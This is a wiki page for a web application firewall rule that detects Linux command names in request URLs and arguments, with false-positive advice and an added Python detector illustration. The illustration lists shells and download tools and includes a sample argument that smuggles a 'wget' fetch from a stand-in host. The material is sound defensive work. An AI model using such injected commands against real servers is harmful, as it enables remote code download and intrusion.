WAF 340029

From Atomicorp Wiki
Rule: 340029
Status: Active
Alert Message: Atomicorp.com WAF Rules: Possible command in REQUEST_URI or Argument

Description

This rule detects when a Linux command is used in a URL or an argument. It specifically looks for these types of commands:

  • process management tools (kill, nice, etc.)
  • file management tools (cp, chown, rm, etc.)
  • shells (bash, tcsh, etc.)
  • compilers (gcc, c++, etc.)
  • web downloading tools (wget, curl, etc.)
  • interpreters (perl, php, etc.)
  • other downloading tools (scp, ftp, etc.)


Some attack tools are known to blindly probe for software tools to see whether they can use them. Therefore, the fact that this rule is triggered does not mean that the software tool is installed on the system.

If your system is being targeted with these kinds of attacks, we do not recommend that you disable this rule. This rule may be telling you that someone is attacking your system, and therefore you should block this source. Please see the blog post referenced below for information about leaving rules enabled for applications you may not have installed.

Troubleshooting

False Positives

A false positive could occur if an application safely allows the use of these tools, or if the data is used in a non-command context, such as in a document. The rule contains a large number of known safe applications that may either use these tools securely or allow this data in non-command mode. If you have confirmed that your application is safely using these commands, or is using this data in a non-command format, please let us know what the application is and how you confirmed this, so that we can duplicate it in our test environment, and report the issue as a False Positive per the article below:

https://www.atomicorp.com/wiki/index.php/Reporting_False_Positives#WAF.2FModsecurity_rules_False_Positives
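
The following is an added illustration, not the Atomicorp rule or any code from this wiki: a simplified check for the command names listed in the Description, run over constructed request URIs, showing both a hit and the non-command false positive described above. The command list, the token-boundary matching, and the names `COMMANDS`, `inspect` and `SAMPLES` are assumptions made for the example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Only the command names this page gives as examples (assumption: the
# real rule's list and matching logic are not shown on the page).
COMMANDS = {
    "process management": ["kill", "nice"],
    "file management": ["cp", "chown", "rm"],
    "shells": ["bash", "tcsh"],
    "compilers": ["gcc", "c++"],
    "web downloading": ["wget", "curl"],
    "interpreters": ["perl", "php"],
    "other downloading": ["scp", "ftp"],
}


def _compile(names):
    # Match a name only as a whole token, so "curly" is not "curl" and the
    # extension in "index.php" is not the "php" interpreter.
    alt = "|".join(re.escape(n) for n in names)
    return re.compile(r"(?<![\w.+-])(?:" + alt + r")(?![\w+-])", re.IGNORECASE)


PATTERNS = {cat: _compile(names) for cat, names in COMMANDS.items()}


def inspect(request_uri):
    """Return sorted (location, category, command) hits for one request URI."""
    parts = urlsplit(request_uri)
    # Inspect the decoded path and every decoded query argument separately.
    targets = [("path", unquote(parts.path))]
    targets += [("arg:" + k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    hits = set()
    for where, value in targets:
        for cat, pat in PATTERNS.items():
            for m in pat.finditer(value):
                hits.add((where, cat, m.group(0).lower()))
    return sorted(hits)


# Constructed sample requests (not taken from real traffic).
SAMPLES = [
    "/status?host=localhost%3B+wget+http%3A%2F%2Fexample.invalid%2Ftool",  # command in an argument
    "/index.php?page=2",                   # file extension only, no hit
    "/blog/comment?text=have+a+nice+day",  # document text: false positive
]

if __name__ == "__main__":
    for uri in SAMPLES:
        print(uri, "->", inspect(uri))
```

The third sample matches on "nice" even though the value is ordinary text, which is the non-command context that should be confirmed and reported rather than handled by disabling the rule.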

Tuning Guidance

If you want to disable this rule, please see the Tuning the Atomicorp WAF Rules page for basic information.

Additional Information

Blog Articles

None.

Similar Rules

None.

Knowledge Base Articles

None.

Outside References

None.

Notes
